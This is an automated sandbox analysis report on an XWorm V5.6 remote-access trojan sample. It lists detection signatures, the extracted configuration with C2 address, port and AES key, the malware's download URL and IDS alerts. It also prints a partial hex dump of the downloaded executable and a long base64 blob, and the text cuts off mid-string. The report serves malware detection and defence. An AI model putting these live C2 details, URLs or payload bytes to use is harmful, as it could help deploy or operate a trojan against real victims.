Windows Analysis Report
147.45.44.42 tqvjt.exe

Overview

General Information

Sample name: 147.45.44.42 tqvjt.exe
Analysis ID: 1614036
MD5: 33cb4b4e38e7d64b4def028828c94a58
SHA1: 87faf4a86f3a64219f6e77e9e187b28f0a98149f
SHA256: 53a2f686422f9f71b69d3a9699661c96dc1375d490ea188d5141bb1e8ae89029
Tags: 147-45-44-42bookingexeuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 147.45.44.42 tqvjt.exe Avira: detected
Antivirus detection for URL or domain
Source: http://147.45.44.42/boom/tqvjt.exe Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.dll Avira: detection malicious, Label: TR/Dropper.Gen7
Found malware configuration
Source: 00000000.00000002.1594780205.0000000002812000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["185.7.214.54"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Multi AV Scanner detection for submitted file
Source: 147.45.44.42 tqvjt.exe Virustotal: Detection: 38% Perma Link
Source: 147.45.44.42 tqvjt.exe ReversingLabs: Detection: 37%
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Sample uses string decryption to hide its real strings
Source: 00000000.00000002.1594780205.0000000002812000.00000004.00000800.00020000.00000000.sdmp String decryptor: 185.7.214.54
Source: 00000000.00000002.1594780205.0000000002812000.00000004.00000800.00020000.00000000.sdmp String decryptor: 4411
Source: 00000000.00000002.1594780205.0000000002812000.00000004.00000800.00020000.00000000.sdmp String decryptor: P0WER
Source: 00000000.00000002.1594780205.0000000002812000.00000004.00000800.00020000.00000000.sdmp String decryptor: <Xwormmm>
Source: 00000000.00000002.1594780205.0000000002812000.00000004.00000800.00020000.00000000.sdmp String decryptor: XWorm V5.6
Source: 00000000.00000002.1594780205.0000000002812000.00000004.00000800.00020000.00000000.sdmp String decryptor: USB.exe
Source: 147.45.44.42 tqvjt.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: q6C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.pdb@\ source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.0000000002761000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: q6C:\Users\user\AppData\Local\Temp\rjhqheow\rjhqheow.pdb source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.0000000002761000.00000004.00000800.00020000.00000000.sdmp

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49706 -> 185.7.214.54:4411
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.7.214.54:4411 -> 192.168.2.9:49706
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.9:49706 -> 185.7.214.54:4411
Source: Network traffic Suricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 185.7.214.54:4411 -> 192.168.2.9:49706
Source: Network traffic Suricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.9:49706 -> 185.7.214.54:4411
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.7.214.54
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.9:49706 -> 185.7.214.54:4411
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Feb 2025 07:16:50 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 12 Feb 2025 20:14:40 GMTETag: "8200-62df7976c8552"Accept-Ranges: bytesContent-Length: 33280Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5e f8 ac 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 78 00 00 00 08 00 00 00 00 00 00 6e 97 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 1c 97 00 00 4f 00 00 00 00 a0 00 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 77 00 00 00 20 00 00 00 78 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 04 00 00 00 a0 00 00 00 06 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 97 00 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 4f 00 00 f0 47 00 00 01 00 00 00 14 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 0a 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 00 11 02 03 28 11 00 00 0a 28 12 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 13 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 14 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 02 28 15 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 18 00 00 00 09 00 00 11 02 8c 01 00 00 1b 2d 0a 28 01 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /boom/tqvjt.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 147.45.44.42 147.45.44.42
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View ASN Name: DELUNETDE DELUNETDE
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.42
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: unknown TCP traffic detected without corresponding DNS query: 185.7.214.54
Source: global traffic HTTP traffic detected: GET /boom/tqvjt.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42Connection: Keep-Alive
Source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.00000000027E2000.00000004.00000800.00020000.00000000.sdmp, 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.00000000027F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.42
Source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.0000000002761000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000001.00000003.1579058148.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, rjhqheow.0.cs.0.dr String found in binary or memory: http://147.45.44.42/boom/tqvjt.exe
Source: csc.exe, 00000001.00000003.1579593003.0000000005D21000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.42/boom/tqvjt.exe0
Source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1595232575.0000000004CA0000.00000004.08000000.00040000.00000000.sdmp, 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.0000000002761000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000001.00000003.1579017311.0000000005700000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000001.00000002.1580291316.0000000005700000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000001.00000003.1579193933.0000000005700000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000001.00000002.1580266254.00000000056E7000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000001.00000003.1579155831.00000000056E4000.00000004.00000020.00020000.00000000.sdmp, rjhqheow.dll.1.dr String found in binary or memory: http://147.45.44.42/boom/tqvjt.exe04
Source: csc.exe, 00000001.00000003.1578975897.00000000056F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.42/boom/tqvjt.exeC
Source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.0000000002761000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://147.45.44.42/boom/tqvjt.exeP
Source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594297952.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microsoft.c
Source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.0000000002761000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.4035947986.00000000030C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.147.45.44.42 tqvjt.exe.27ff5ba.2.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.147.45.44.42 tqvjt.exe.27ff5ba.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1594780205.0000000002812000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.4034857521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1594780205.00000000027FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
.NET source code contains very large strings
Source: 147.45.44.42 tqvjt.exe, n5Dh00mp5s.cs Long String: Length: 12284
Abnormal high CPU Usage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_016181D8 5_2_016181D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0161B2B8 5_2_0161B2B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01615510 5_2_01615510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01615DE0 5_2_01615DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0161BFF8 5_2_0161BFF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_016151C8 5_2_016151C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_01610BA0 5_2_01610BA0
Sample file is different than original file name gathered from version info
Source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.0000000002812000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameXClient.exe4 vs 147.45.44.42 tqvjt.exe
Source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1595232575.0000000004CA0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamerjhqheow.dll4 vs 147.45.44.42 tqvjt.exe
Source: 147.45.44.42 tqvjt.exe, 00000000.00000000.1572009733.00000000004FA000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameTmpFolder.exe4 vs 147.45.44.42 tqvjt.exe
Source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.0000000002761000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamerjhqheow.dll4 vs 147.45.44.42 tqvjt.exe
Source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594297952.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 147.45.44.42 tqvjt.exe
Source: 147.45.44.42 tqvjt.exe, 00000000.00000002.1594780205.00000000027FF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameXClient.exe4 vs 147.45.44.42 tqvjt.exe
Source: 147.45.44.42 tqvjt.exe Binary or memory string: OriginalFilenameTmpFolder.exe4 vs 147.45.44.42 tqvjt.exe
Yara signature match
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.147.45.44.42 tqvjt.exe.27ff5ba.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.147.45.44.42 tqvjt.exe.27ff5ba.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1594780205.0000000002812000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000005.00000002.4034857521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1594780205.00000000027FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.147.45.44.42 tqvjt.exe.2802604.1.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.147.45.44.42 tqvjt.exe.2812b30.0.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 147.45.44.42 tqvjt.exe, n5Dh00mp5s.cs Base64 encoded string: 'P/nLg5h4d30hMtfN08uwTmMYTveO9b+iZxlVTjLT96uajSVrHT63t4/Ij0ZeDjts2eeJnLVjXC09zeOl7IttcEVjUPvXgaqRUQRcMtLRlam/NHsTO03m+7KFp2JuP0nO07qd6jM8JhQBoMGTxrlSXRAbpa/ngdVvYXIZIPOmqbCVbWMsOZPo6OXDaBhWbh7b0uKBTHsiCgHA35mWuFBMPQQeot+6y3FJVzI68u3H/o9JYWUUK+COuJ0oSHQket7N+qbaWj1GKWaCgvr1ZzJVGgvK/+iUiz5mHzhM7aa8kVZnRAMt+sWRo+o+Og8uIL3AuZV8aUpwAODbhoeUXVAiAi7VoLSsNkJpMUnp9OrKr3JwCXuPx+L6iFdKXkxc3abc+u4KSBIXtNL8jIh8c0IrLvqApficTWEobMm747i9PlFrLiHC0eyBvGZSCxDN4p+d+HgOJD4S9LGn1IpFVx56rN3M4oRpPWcjLPbfjYOJJwFAfpqIsL7ASm4YbA2G2ru1jiNRHAuS/NuThm5AGRFr6+3sxmlnGjE15tXtvqxzEh80OKDFmpNwCWpiHODS+MaITEBjLiCB1LW8ZlFYZ1Pj8s6LsmwpZS9ZiKmo2EZ8Rx8aoMXYuqdCQQsbStKsl8N7RgoFKOusrJaXR3YDJwiu/oilFEl+IwLU1bSRrmJKAh509p6NsVwAAEIL9OGM3dxPRRAu7cjau/g1E1hoZr7Oi6LScXwrctrx8K/JRmhgPA3UzvKLhjpAAQPa49yUmSlOeDVJ8Puyk6crJSYk1t70/KxzCAsIKPicm5yeBUZ0CM7//ZnUAFdsB2jFjbaxmmYle13u7J6Wt3Rpdj4+wuGshLhlVggcrI2/38wSAEhmSsn5h8FkSwYiNP+Z34GCXzYuGw26v6OvLXhnDx/Y2JKlmHNuHww16Nqqtk0IXBRe7uvE55VbXV5+HdLerqVdVhkFPv7AmLzbODQgLzb1w4uKSVVndgXMmvaIjTgIEhMswNmWoS91YUEU7ve06qxpBGw+A9rvq5dsC2ccLKaRzcPkCRs0QMjs65iFWF9eEynZibOLnmctPVfryJK0t2Fsa3823+P5pLd2QxUWurDJuK5mWGZiRs37nsGfUQ56PPm0nI6LTX8JFAqg5ouqlCh0OxiZ4oqk6GxnGDI5+MLHtasoBBgP9PvK+qddWBNOUMrT7OupTwRgPO/C5LD+bXEiQ32RjvKGDwR9ZhXE096AxzRJED8py8yF3itdfEl99vvPvp9yETcXGPHrp7hzMXk4LLzR7q+EBXZ2EBTm9NKQWmkZHiPCzPCHiHIxMV0Lxfeesn5RUWV2j5CO7OIiGgUFSertvrsaTHUiV8T5jf3IRFExNUuHwo2PRntkDgWt4o+W6H1qPxbY6cCnoHB/bDd495qbjKgzQQof+c/t7YVVCioVCNbb6KjkThsxP/Pk4YvZYnkWTgP29I7WoQh5ehfV692auiBUCjcg29CJiZIXRRtYxN7Y4rl3CiEFFufmtLqP